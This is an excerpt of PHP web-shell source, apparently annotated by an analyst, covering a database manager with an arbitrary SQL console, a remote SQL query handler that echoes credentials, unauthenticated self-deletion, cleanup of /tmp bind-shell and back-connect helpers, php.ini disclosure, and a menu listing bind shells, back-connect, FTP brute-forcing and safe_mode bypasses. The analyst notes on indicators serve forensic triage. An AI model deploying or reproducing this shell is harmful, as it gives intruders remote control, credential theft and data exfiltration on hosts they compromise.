1379                 $dsql = "drop table $tablename";
1380                 $result=exequery($dsql, $tablename, $dbname);
1381                 unset($tablename); //="false";
1382                 unset($_POST['tablename']);
1383         }
1384 //*****************Write Your Own Query *****************
1385         if(isset($_POST['wyoq'])){  //post
1386                 $value="??????? ???????? ???????";
1387                 goto($tablename, $dbname, $action, 'but', 'start', $value );
1388                 echo"<form method='post'>\n";
1389                 echo"<input type='hidden' name='dbname' value=$dbname>\n";
1390                 //echo"<input type=text name='wyqota' width='500px' style='overflow-x:visible;'>\n";
1391                 echo"<textarea name='wyoqta' cols='60' rows='5' style='overflow-y:visible'></textarea>\n";
1392                 echo"<br><input class=but type=submit name='runquery' value='Execute Query'>\n";
1393                 echo"</form><br>\n";
1394         }
1395         if(isset($_POST['runquery'])){
1396                 $wyoqta = StripSlashes($_POST['wyoqta']);
1397                 $result=exequery($wyoqta, " ", " ");
1398                 if(@mysql_num_rows($result) >0){
1399                          $numrows=mysql_num_rows($result);
1400                         $flds=mysql_num_fields($result);
1401                         echo"<table>";
1402                         for($r=0; $r < $numrows; $r++){
1403                                 echo"<tr>";
1404                                 $row=mysql_fetch_array($result);
1405                                 for($col = 0; $col < $flds; $col ++){
1406                                         $nslash = StripSlashes($row[$col]);
1407                                         echo"<td>$nslash</td>";
1408                                 }
1409                                 echo"</tr>";
1410                         }
1411                         echo"</table>";
1412                 }elseif (mysql_affected_rows()){
1413                         echo" Number of Rows affected: ".mysql_affected_rows();
1414                 }else{
1415                         echo" Nothing returned from the query.";
1416                 }
1417         }
1418 // ****************List Tables***************************
1419         if( ! isset($tablename) || $tablename==" " ){
1420                 $dbname=$_SESSION['dbname'];
1421                 $result = mysql_list_tables($_SESSION['dbname']);
1422                  $numtab = mysql_num_rows ($result);
1423                  if($numtab == 1){
1424                         $_SESSION['tablename'] =mysql_tablename($result, 0);
1425                  }
1426 //***************** Buttons ******************************
1427                 if (isset($_POST['runquery'])){
1428                         $dbname=$_SESSION['dbname'];
1429                         $value="$dbname Start"; //Table Manager Start
1430                         goto("", $_SESSION['dbname'], $action, 'but', 'tablestart', $value );
1431                 }elseif (! isset($_POST['wyoq']) && ! isset($_POST['runquery'])){ //write your own query.
1432                         echo"<table width=40% border=0 align='left' >\n";
1433                         echo"<tr><td>";
1434                         $va="????? ???? ????";
1435                         goto("", $_SESSION['dbname'], "create.php", 'but', 'create', $va );
1436           //  echo"<a href=create.php class='crt'>Create new Table</a>\n";
1437                         echo"</td><td>";
1438         $value="??????? ????????"; //Choose DB
1439                 goto("", "", $action, 'but', 'db', $value );
1440                 echo"</td>\n";
1441                         $value="Write Your Own Query";
1442                         goto(" ", $_SESSION['dbname'], $action, 'but', 'wyoq', $value );
1443                         echo"</td></tr>";
1444                         echo"</table><br><br><br><br><div style='clear:both;'></div>";
1445                         echo"<table width=100% border=0 align='center' >\n";
1446                         for ($i =0; $i < $numtab; $i++) {
1447                                 $tb_names[$i] = mysql_tablename($result, $i);
1448                                 echo"<tr class='frow'><td align='center'>\n";
1449                                 $va="??? ???? * $tb_names[$i]";
1450                                 goto($tb_names[$i], $_SESSION['dbname'],$action, 'but', $tb_names[$i], $va );
1451                                 echo"</td><td  align='center' valign='middle'>\n";
1452                                 $va="??? ???? $tb_names[$i]";
1453                                 goto($tb_names[$i], $_SESSION['dbname'],$action, 'del', 'deltable', $va );
1454                                 echo"</td><td  align='center' valign='middle'>\n";
1455                                 $va="Alter Table $tb_names[$i]";
1456                                 goto($tb_names[$i], $_SESSION['dbname'],'alter.php', 'but', 'altertable', $va );
1457                                 echo"</td><td align='center' valign='middle'>\n";
1458                                 searchtableform($tb_names[$i], $_SESSION['dbname']);
1459                                 echo"</td><td>";
1460                 //Table size in bytes
1461                echo mysize($_SESSION['dbname'],$tb_names[$i]);
1462                 echo"</td></tr>\n";
1463                         }//for
1464                         echo"</table>\n";
1465                 }
1466         }else{ //tablename is set
1467 //***************** menu *****************************************
1468                 echo"<table><tr class='frow'><td>\n";
1469                 $value="$_SESSION[dbname] Start"; //Ex Table Manager Start
1470                 goto($tablename, $_SESSION['dbname'], $action, 'but', 'tablestart', $value );
1471                 echo"</td>\n";
1472         echo"<td>\n";
1473         $value="??????? ????????"; //Choose DB
1474                 goto("", "", $action, 'but', 'start', $value );
1475                 echo"</td>\n";
1476         echo"<td>\n";
1477         $value="Write Your Own Query";
1478                 goto(" ", $_SESSION['dbname'], $action, 'but', 'wyoq', $value );
1479         echo"</td>\n";
1480                 if (!isset($_POST['add']) && !isset($_POST['deltable']) && isset($tablename)){
1481                         echo"<td>";
1482                         //$tablename = $_POST['tablename'];
1483                         $va="Add a $tablename Record";
1484                         goto($tablename, $_SESSION['dbname'], 'alter.php', 'but', 'add', $va );
1485                         echo"</td>\n";
1486                 }
1487                 if (!isset($_POST['deltable'])){
1488                         echo"<td>\n";
1489                         searchtableform($tablename, $_SESSION['dbname']);
1490                         echo"</td>\n";
1491                 }
1492                 echo"</tr></table>\n";
1493                 echo"<br />\n";
1494 //**************************************************
1495                 if(isset($_POST['addrec'])){
1496            // $showall=false;
1497                         $result=addrecord($tablename, $_SESSION['dbname'], $_POST['array']);
1498                 }elseif(isset($_POST['add'])){
1499             $showall=false;
1500                         addform($tablename, $_SESSION['dbname']);
1501                 }elseif(isset($_POST['delete'])){
1502                         //delete record has been pushed
1503            // $showall=false;
1504                         $whr=buildwhr($_POST['pk'], $_POST['pv']);
1505                         $sql = "delete from $tablename where $whr";
1506                         $result=exequery($sql, $tablename, $_SESSION['dbname']);
1507                 }elseif (isset($_POST['edit'])){//Edit
1508             $showall=false;
1509                         $whr = buildwhr( $_POST['pk'], $_POST['pv']);
1510                         //$tablename = $_SESSION['tablename'];
1511                         $sql= "Select * from $tablename where $whr";
1512                         $result=exequery($sql, $tablename, $_SESSION['dbname']);
1513                         editform($tablename, $_SESSION['dbname'], $result, 'edit', $_POST['pk'], $_POST['pv']);
1514                 }elseif(isset($_POST['editrec'])){
1515            // $showall=false;
1516                         $result=editrec($_SESSION['dbname'],$tablename, $_POST['pk'], $_POST['pv'], $_POST['array']);
1517                 }
1518 //**************** Search ************************************
1519                 if(isset($_POST['searchval'])){
1520                         $searchval=$_POST['searchval'];
1521                 }elseif(isset($_GET['searchval'])){
1522                         $searchval=$_GET['searchval'];
1523                 }else{
1524                         $searchval="";
1525                 }
1526                 if (isset($_GET['tablename'])){
1527                         $tablename = $_GET['tablename'];
1528                 }
1529                 if((isset($_POST['search'])|| isset($searchval)) && $searchval !=""){
1530                         $result=searcht($tablename, $_SESSION['dbname'],  $searchval);
1531                 }else{
1532                         //Display All
1533                         $query = "select * from $tablename";
1534                         $result=exequery($query, $tablename, $_SESSION['dbname']);
1535                 }
1536 //***************** Display record count *****************************************
1537         if($showall){
1538             $num_rows = mysql_num_rows($result);
1539             //Workout whick page to display
1540                     if(!isset($_GET['pg']) && !isset($pg)){
1541                             $beg=0;
1542                 $pg=0;
1543                     }else{
1544                 if(isset($_GET['pback'])){
1545                     $pg=$_GET['pg'];
1546                 }else{
1547                     $pg=$_GET['pg'];
1548                 }
1549                  if($pg < 0 ){
1550                     $pg=0;
1551                 }
1552                 if($pg > $num_rows/$pagemax){
1553                     $pg=ceil($num_rows/$pagemax)-1;
1554                 }
1555                 $beg = $pg * $pagemax;
1556                     }
1557                     if (!isset($_POST['add'])){
1558                             $pscrol=" ";
1559                             $pagescrol =" ";
1560                             $pagescrol = whichpage($num_rows, $pagemax, $pg, $tablename, $searchval);
1561                             echo "$pagescrol\n"; //Display next Top page menu
1562                             $flds = mysql_num_fields($result);
1563                             echo"<table border=0 width='100%'>\n";
1564                             echo"<tr class=head><td></td><td></td>\n";
1565                             $fields = mysql_list_fields( $_SESSION['dbname'], $tablename);
1566                             $z=0;
1567                             $x =0;
1568                             $pkfield=array();
1569 //*************Display each of the field names.***************************
1570                             for ($i = 0; $i < $flds; $i++) {
1571                                         echo "<td>".mysql_field_name($fields, $i)."</td>\n";
1572                                     //Find the primary key
1573                                     $flagstring = mysql_field_flags ($result, $i);
1574                                     if(eregi("primary",$flagstring )){
1575                                             $pk[$z] = $i;
1576                                             $pkfield[$z]= mysql_field_name($fields, $i);
1577                                             $z++;
1578                                     }
1579                             }
1580                             echo"</tr>\n";
1581                             $tbl=$tablename;
1582                             //if(isset($pk)){
1583                             if($z > 0){
1584                                     $cpk=count($pk);
1585                             }else{
1586                                     $cpk=0;
1587                             }
1588 //************Display each row from the table.********************************
1589                             for ($s=$beg; $s < $beg + $pagemax; $s++){
1590                                     if($s < $num_rows){
1591                                             if (!mysql_data_seek ($result, $s)) {
1592                                         echo "Cannot seek to row $s\n";
1593                                         continue;
1594                                     }
1595                                             $row=mysql_fetch_array($result);
1596                                             if(!isset($pk)){
1597                                                     $pk=" ";
1598                                                     $pkfield= array();
1599                                             }
1600                                             displayrow($_SESSION['dbname'], $tbl, $pk, $pkfield, $cpk, $row, $flds);
1601                                     }
1602                             }
1603                     }
1604                     echo"</table>\n";
1605                     if (!isset($_POST['add']) && !isset($_POST['edit']) && !isset($_POST['deltable']) && !isset($_POST['droptab']) && !isset($_POST['wyoq']) && $tablename){
1606                             echo"<br>";
1607                             echo "$pagescrol\n"; //Display bottom next page menu
1608                     }
1609                     echo"<br><br>\n";
1610                  }//showall
1611                  if(isset($_POST['tablename'])){
1612                          echo"<table border=0>";
1613                      echo"<tr><td>";
1614                          $tablename=$_POST['tablename'];
1615                          $va="Alter Table $tablename";
1616                          goto( $tablename,  $_SESSION['dbname'],'alter.php', 'but', 'altertable', $va );
1617                          echo"</td></tr>\n";
1618                          echo"</table>\n";
1619                 }
1620         }
1621 }
1622 display_foot();
1623 echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";  die(); }
// [analyst note] SQL console handler of the web shell. Runs when the POST field cmd equals "db_query".
// Server, port, login, password and database name are all taken from the request (db, db_server,
// db_port, mysql_l, mysql_p, mysql_db), so the web host connects to whatever database server the
// requester names. The my_sql class and the in() helper are declared outside this excerpt.
// Triage: these field names travel in the POST body, so a plain access log shows only a POST to the
// script. Check request-body/WAF logging and the database server's own connection and query logs
// for sessions opened from the web host, and treat any credentials seen here as exposed.
1624 if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
1625  {
1626  echo $head;
1627  $sql = new my_sql();
1628  $sql->db   = $_POST['db'];
1629  $sql->host = $_POST['db_server'];
1630  $sql->port = $_POST['db_port'];
1631  $sql->user = $_POST['mysql_l'];
1632  $sql->pass = $_POST['mysql_p'];
1633  $sql->base = $_POST['mysql_db'];
      // Plain split on ';' with no SQL parsing: a semicolon inside a string literal also splits the statement.
1634  $querys = @explode(';',$_POST['db_query']);
1635  echo '<body bgcolor=#000000>';
1636  if(!$sql->connect()) echo "<div align=center><font face=tahoma size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
1637   else
1638    {
1639    if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=tahoma size=-2 color=red><b>?? ?????? ????? ????? ????????</b></font></div>";
1640    else
1641     {
1642     foreach($querys as $num=>$query)
1643      {
           // Fragments of five bytes or fewer (blank tails after the last ';') are skipped.
1644       if(strlen($query)>5)
1645       {
1646       echo "<font face=tahoma size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
           // query() is defined elsewhere; from the branches below, '0' is an error, '1' a result set, '2' a row count.
1647       switch($sql->query($query))
1648        {
1649        case '0':
1650        echo "<table width=100%><tr><td><font face=tahoma size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
1651        break;
1652        case '1':
1653        if($sql->get_result())
1654         {
1655                echo "<table width=100%>";
            // Column names and cell values are HTML-escaped in place before being joined into table rows.
1656         foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
1657                $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=tahoma size=-2><b>&nbsp;", $sql->columns);
1658         echo "<tr><td bgcolor=#333333><font face=tahoma size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
1659         for($i=0;$i<$sql->num_rows;$i++)
1660          {
1661          foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
1662          $values = @implode("&nbsp;</font></td><td><font face=tahoma size=-2>&nbsp;",$sql->rows[$i]);
1663          echo '<tr><td><font face=tahoma size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
1664          }
1665         echo "</table>";
1666         }
1667        break;
1668        case '2':
1669        $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
1670        echo "<table width=100%><tr><td><font face=tahoma size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
1671        break;
1672        }
1673       }
1674      }
1675     }
1676    }
      // The form below writes the submitted connection values, including the password field mysql_p,
      // back into hidden inputs, so they appear in the HTML response. Unlike the result table,
      // $sql->base, $_POST['db_query'] and $_SERVER['PHP_SELF'] are echoed without htmlspecialchars().
1677  echo "<br><form name=form method=POST>";
1678  echo in('hidden','db',0,$_POST['db']);
1679  echo in('hidden','db_server',0,$_POST['db_server']);
1680  echo in('hidden','db_port',0,$_POST['db_port']);
1681  echo in('hidden','mysql_l',0,$_POST['mysql_l']);
1682  echo in('hidden','mysql_p',0,$_POST['mysql_p']);
1683  echo in('hidden','mysql_db',0,$_POST['mysql_db']);
1684  echo in('hidden','cmd',0,'db_query');
1685  echo "<div align=center>";
1686  echo "<font face=tahoma size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
1687  echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
1688  echo "</form>";
1689  echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
1690  }
// [analyst note] Self-removal: any request carrying a `delete` query parameter unlinks this script
// from disk. No credential check appears in this branch, and the failure case is hidden by '@'.
// When the file is already gone, the remaining evidence is the access-log entry for the ?delete
// request, backups or snapshots of the web root, and filesystem metadata.
1691 if(isset($_GET['delete']))
1692  {
1693    @unlink(__FILE__);
1694  }
// [analyst note] Cleanup: a `tmp` query parameter removes seven fixed paths under /tmp.
// The names line up with the bind-port, back-connect and datapipe features named in the UI string
// table, so these are presumably helper sources and binaries written by other parts of the script
// (not visible in this excerpt). Any of these paths on a web host is an indicator worth collecting
// before it is removed; a .c file next to a same-named binary suggests on-host compilation.
1695 if(isset($_GET['tmp']))
1696  {
1697    @unlink("/tmp/bdpl");
1698    @unlink("/tmp/back");
1699    @unlink("/tmp/bd");
1700    @unlink("/tmp/bd.c");
1701    @unlink("/tmp/dp");
1702    @unlink("/tmp/dpc");
1703    @unlink("/tmp/dpc.c");
1704  }
1705 if(isset($_GET['phpini']))
1706 {
1707 echo $head;
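/**
 * Render one configuration value as an HTML fragment for the php.ini table.
 *
 * null, booleans and the empty string get fixed labels; objects are cast to
 * arrays and arrays are flattened with print_r(); everything else is cast to
 * string. Every non-label result is passed through U_wordwrap().
 *
 * The type checks run before the empty-string check. With the loose
 * `$value == ''` comparison first, null and false both compared equal to ''
 * and the 'NULL' / 'FALSE' labels could never be returned.
 *
 * @param mixed $value value to render
 * @return string HTML fragment
 */
function U_value($value)
 {
 if ($value === null) return 'NULL';
 if (is_bool($value)) return $value ? 'TRUE' : 'FALSE';
 if ($value === '') return '<i>no value</i>';
 if (is_object($value)) $value = (array) $value;
 if (is_array($value))
  {
  // print_r() writes to the output stream; buffer it so the text can be returned instead.
  ob_start();
  print_r($value);
  $value = ob_get_contents();
  ob_end_clean();
  }
 return U_wordwrap((string) $value);
 }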
/**
 * HTML-escape a string and insert soft line breaks so long values wrap in a table cell.
 *
 * The text is escaped first, then cut every 100 characters with a <wbr /> tag.
 * A cut that lands inside an HTML entity is moved to just after the entity's
 * closing ';' so the entity stays intact.
 *
 * @param string $str raw text
 * @return string escaped text with <wbr /> break hints
 */
function U_wordwrap($str)
 {
 $escaped = @htmlspecialchars($str);
 $wrapped = @wordwrap($escaped, 100, '<wbr />', true);
 $splitEntity = '!(&[^;]*)<wbr />([^;]*;)!';
 return @preg_replace($splitEntity, '$1$2<wbr />', $wrapped);
 }
// [analyst note] Body of the ?phpini view: prints every directive returned by ini_get_all() with its
// local and global value, formatted by U_value(). The response therefore discloses the complete PHP
// configuration of the host to whoever requests it. Directive names are concatenated into the
// table without escaping; the values are escaped inside U_wordwrap(). ws() is defined elsewhere.
1728 if (@function_exists('ini_get_all'))
1729  {
1730  $r = '';
1731  echo '<table width=100%>', '<tr><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
1732  foreach (@ini_get_all() as $key=>$value)
1733   {
1734   $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.$key.'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
1735   }
1736  echo $r;
1737  echo '</table>';
1738  }
1739 echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
1740 die();
1741 }
// [analyst note] ?cpu view: reads a file named "cpuinfo" and prints each line as a key/value row
// split on ':'. The path is relative, so the read only succeeds when the current working directory
// contains such a file; otherwise the '---' placeholder row is shown.
// NOTE(review): $r is appended to without being initialised in this branch, and lines are echoed
// without HTML escaping.
1742 if(isset($_GET['cpu']))
1743  {
1744    echo $head;
1745    echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
1746    $cpuf = @file("cpuinfo");
1747    if($cpuf)
1748     {
1749       $c = @sizeof($cpuf);
1750       for($i=0;$i<$c;$i++)
1751         {
1752           $info = @explode(":",$cpuf[$i]);
              // Lines with nothing after the colon get a '---' placeholder value.
1753           if($info[1]==""){ $info[1]="---"; }
1754           $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
1755         }
1756       echo $r;
1757     }
1758    else
1759     {
1760       echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
1761     }
1762    echo '</table>';
1763    echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
1764    die();
1765  }
// [analyst note] ?mem view: same layout as the ?cpu view, reading a file named "meminfo" through a
// relative path and printing each line as a key/value row split on ':'.
// NOTE(review): $r is appended to without being initialised in this branch, and lines are echoed
// without HTML escaping.
1766 if(isset($_GET['mem']))
1767  {
1768    echo $head;
1769    echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
1770    $memf = @file("meminfo");
1771    if($memf)
1772     {
1773       $c = sizeof($memf);
1774       for($i=0;$i<$c;$i++)
1775         {
1776           $info = explode(":",$memf[$i]);
              // Lines with nothing after the colon get a '---' placeholder value.
1777           if($info[1]==""){ $info[1]="---"; }
1778           $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
1779         }
1780       echo $r;
1781     }
1782    else
1783     {
1784       echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
1785     }
1786    echo '</table>';
1787    echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
1788    die();
1789  }
1790 $lang=array(
1791 'eng_text1' =>'Executed command',
1792 'eng_text2' =>'Execute command on server',
1793 'eng_text3' =>'Run command',
1794 'eng_text4' =>'Work directory',
1795 'eng_text5' =>'Upload files on server',
1796 'eng_text6' =>'Local file',
1797 'eng_text7' =>'Aliases',
1798 'eng_text8' =>'Select alias',
1799 'eng_butt1' =>'Execute',
1800 'eng_butt2' =>'Upload',
1801 'eng_text9' =>'Bind port to /bin/bash',
1802 'eng_text10'=>'Port',
1803 'eng_text11'=>'Password for access',
1804 'eng_butt3' =>'Bind',
1805 'eng_text12'=>'back-connect',
1806 'eng_text13'=>'IP',
1807 'eng_text14'=>'Port',
1808 'eng_butt4' =>'Connect',
1809 'eng_text15'=>'Upload files from remote server',
1810 'eng_text16'=>'With',
1811 'eng_text17'=>'Remote file',
1812 'eng_text18'=>'Local file',
1813 'eng_text19'=>'Exploits',
1814 'eng_text20'=>'Use',
1815 'eng_text21'=>'&nbsp;New name',
1816 'eng_text22'=>'datapipe',
1817 'eng_text23'=>'Local port',
1818 'eng_text24'=>'Remote host',
1819 'eng_text25'=>'Remote port',
1820 'eng_text26'=>'Use',
1821 'eng_butt5' =>'Run',
1822 'eng_text28'=>'Work in safe_mode',
1823 'eng_text29'=>'ACCESS DENIED',
1824 'eng_butt6' =>'Change',
1825 'eng_text30'=>'Cat file',
1826 'eng_butt7' =>'Show',
1827 'eng_text31'=>'File not found',
1828 'eng_text32'=>'Eval PHP code',
1829 'eng_text33'=>'Test bypass open_basedir with cURL functions',
1830 'eng_butt8' =>'Test',
1831 'eng_text34'=>'Test bypass safe_mode with include function',
1832 'eng_text35'=>'Test bypass safe_mode with load file in mysql',
1833 'eng_text36'=>'Database . Table',
1834 'eng_text37'=>'Login',
1835 'eng_text38'=>'Password',
1836 'eng_text39'=>'Database',
1837 'eng_text40'=>'Dump database table',
1838 'eng_butt9' =>'Dump',
1839 'eng_text41'=>'Save dump in file',
1840 'eng_text42'=>'Edit files',
1841 'eng_text43'=>'File for edit',
1842 'eng_butt10'=>'Save',
1843 'eng_text44'=>'Can\'t edit file! Only read access!',
1844 'eng_text45'=>'File saved',
1845 'eng_text46'=>'Show phpinfo()',
1846 'eng_text47'=>'Show variables from php.ini',
1847 'eng_text48'=>'Delete temp files',
1848 'eng_butt11'=>'Edit file',
1849 'eng_text49'=>'Delete script from server',
1850 'eng_text50'=>'View cpu info',
1851 'eng_text51'=>'View memory info',
1852 'eng_text52'=>'Find text',
1853 'eng_text53'=>'In dirs',
1854 'eng_text54'=>'Find text in files',
1855 'eng_butt12'=>'Find',
1856 'eng_text55'=>'Only in files',
1857 'eng_text56'=>'Nothing :(',
1858 'eng_text57'=>'Create/Delete File/Dir',
1859 'eng_text58'=>'name',
1860 'eng_text59'=>'file',
1861 'eng_text60'=>'dir',
1862 'eng_butt13'=>'Create/Delete',
1863 'eng_text61'=>'File created',
1864 'eng_text62'=>'Dir created',
1865 'eng_text63'=>'File deleted',
1866 'eng_text64'=>'Dir deleted',
1867 'eng_butt65'=>'Create',
1868 'eng_text65'=>'Create',
1869 'eng_text66'=>'Delete',
1870 'eng_text67'=>'Chown/Chgrp/Chmod',
1871 'eng_text68'=>'Command',
1872 'eng_text69'=>'param1',
1873 'eng_text70'=>'param2',
1874 'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
1875 'eng_text72'=>'Text for find',
1876 'eng_text73'=>'Find in folder',
1877 'eng_text74'=>'Find in files',
1878 'eng_text75'=>'* you can use regexp',
1879 'eng_text76'=>'Search text in files via find',
1880 'eng_text80'=>'Type',
1881 'eng_text81'=>'Net',
1882 'eng_text82'=>'Databases',
1883 'eng_text83'=>'Run SQL query',
1884 'eng_text84'=>'SQL query',
1885 'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
1886 'eng_text86'=>'Download files from server',
1887 'eng_butt14'=>'Download',
1888 'eng_text87'=>'Download files from remote ftp-server',
1889 'eng_text88'=>'FTP-server:port',
1890 'eng_text89'=>'File on ftp',
1891 'eng_text90'=>'Transfer mode',
1892 'eng_text91'=>'Archivation',
1893 'eng_text92'=>'without archivation',
1894 'eng_text93'=>'FTP',
1895 'eng_text94'=>'FTP-bruteforce',
1896 'eng_text95'=>'Users list',
1897 'eng_text96'=>'Can\'t get users list',
1898 'eng_text97'=>'checked: ',
1899 'eng_text98'=>'success: ',
1900 'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
1901 'eng_text100'=>'Send file to remote ftp server',
1902 'eng_text101'=>'Use reverse (user -> resu) login for password',
1903 'eng_text102'=>'Mail',
1904 'eng_text103'=>'Send email',
1905 'eng_text104'=>'Send file to email',
1906 'eng_text105'=>'To',
1907 'eng_text106'=>'From',
1908 'eng_text107'=>'Subj',
1909 'eng_butt15'=>'Send',
1910 'eng_text108'=>'Mail',
1911 'eng_text109'=>'Hide',
1912 'eng_text110'=>'Show',
1913 'eng_text111'=>'SQL-Server : Port',
1914 'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
1915 'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
1916 'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
1917 'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()',
1918 'eng_text116'=>'Copy from',
1919 'eng_text117'=>'to',
1920 'eng_text118'=>'File copied',
1921 'eng_text119'=>'Cant copy file',
1922 'eng_err0'=>'Error! Can\'t write in file ',
1923 'eng_err1'=>'Error! Can\'t read file ',
1924 'eng_err2'=>'Error! Can\'t create ',
1925 'eng_err3'=>'Error! Can\'t connect to ftp',
1926 'eng_err4'=>'Error! Can\'t login on ftp server',
1927 'eng_err5'=>'Error! Can\'t change dir on ftp',
1928 'eng_err6'=>'Error! Can\'t sent mail',
1929 'eng_err7'=>'Mail send',
1930 'eng_text200'=>'read file from vul copy()',
1931 'eng_text202'=>'where file in server',
1932 'eng_text300'=>'read file from vul curl()',
1933 'eng_text203'=>'read file from vul ini_restore()',
1934 'eng_text204'=>'write shell from vul error_log()',
1935 'eng_text205'=>'write shell in this side',
1936 'eng_text206'=>'read dir',
1937 'eng_text207'=>'read dir from vul reg_glob',
1938 'eng_text208'=>'execute with function',
1939 'eng_text209'=>'read dir from vul root',
1940 'eng_text210'=>'DeZender ',
1941 'eng_text211'=>'::safe_mode off::',
1942 'eng_text212'=>'colse safe_mode with php.ini',
1943 'eng_text213'=>'colse security_mod with .htaccess',
1944 'eng_text214'=>'Admin name',
1945 'eng_text215'=>'IRC server ',
1946 'eng_text216'=>'#room name',
1947 'eng_text217'=>'server',
1948 'eng_text218'=>'write ini.php file to close safe_mode with ini_restore vul',
1949 'eng_text219'=>'Get file to server in safe_mode and change name',
1950 'eng_text220'=>'show file with symlink vul',
1951 'eng_text221'=>'zip file in server to download',
1952 'ar_text222'=>'2 symlink use vul',
1953 'ar_text223'=>'read file from funcution',
1954 'ar_text224'=>'read file from PLUGIN ',
1955 /* --------------------------------------------------------------- */
1956 'ar_text1' =>'????? ??????',
1957 'ar_text2' =>'????? ??????? ?? ???????',
1958 'ar_text3' =>'??? ???????',
1959 'ar_text4' =>'???? ???? ???? ??? ???????',
1960 'ar_text5' =>'??? ??? ??? ???????',
1961 'ar_text6' =>'???? ????',
1962 'ar_text7' =>'????? ?????',
1963 'ar_text8' =>'???? ?????',
1964 'ar_butt1' =>'?????',
1965 'ar_butt2' =>'????',
1966 'ar_text9' =>'??? ???? ?? ??????? ??? /bin/bash',
1967 'ar_text10'=>'?????',
1968 'ar_text11'=>'?????? ??????',
1969 'ar_butt3' =>'???',
1970 'ar_text12'=>'?????? ?????',
1971 'ar_text13'=>'???? ??',
1972 'ar_text14'=>'??????',
1973 'ar_butt4' =>'??????',
1974 'ar_text15'=>'??? ????? ??? ???????',
1975 'ar_text16'=>'?? ????',
1976 'ar_text17'=>'???? ?????',
1977 'ar_text18'=>'???? ?????',
1978 'ar_text19'=>'Exploits',
1979 'ar_text20'=>'??????',
1980 'ar_text21'=>'????? ??????',
1981 'ar_text22'=>'????? ????????',
1982 'ar_text23'=>'?????? ??????',
1983 'ar_text24'=>'??????? ??????',
1984 'ar_text25'=>'?????? ??????',
1985 'ar_text26'=>'??????',
1986 'ar_butt5' =>'?????',
1987 'ar_text28'=>'????? ?? ????? ?????',
1988 'ar_text29'=>'????? ??????',
1989 'ar_butt6' =>'????',
1990 'ar_text30'=>'??? ???',
1991 'ar_butt7' =>'???',
1992 'ar_text31'=>'????? ??? ?????',
1993 'ar_text32'=>'????? ??? php ?? ???? ???? eval',
1994 'ar_text33'=>'Test bypass open_basedir with cURL functions',
1995 'ar_butt8' =>'??????',
1996 'ar_text34'=>'????? ??????? ?? ???? ???? include',
1997 'ar_text35'=>'????? ??????? ?? ???? ???? Mysql',
1998 'ar_text36'=>'??????? . ??????',
1999 'ar_text37'=>'??? ????????',
2000 'ar_text38'=>'???? ??????',
2001 'ar_text39'=>'???????',
2002 'ar_text40'=>'???? ?? ????? ???????',
2003 'ar_butt9' =>'????',
2004 'ar_text41'=>'??? ?????? ??',
2005 'ar_text42'=>'????? ???????',
2006 'ar_text43'=>'????? ?????? ??????',
2007 'ar_butt10'=>'???',
2008 'ar_text44'=>'???????? ??????? ??? ??? ????? ??? ????',
2009 'ar_text45'=>'?? ?????',
2010 'ar_text46'=>'??? phpinfo()',
2011 'ar_text47'=>'???? ????????? ?? php.ini',
2012 'ar_text48'=>'??? ????? ??? temp',
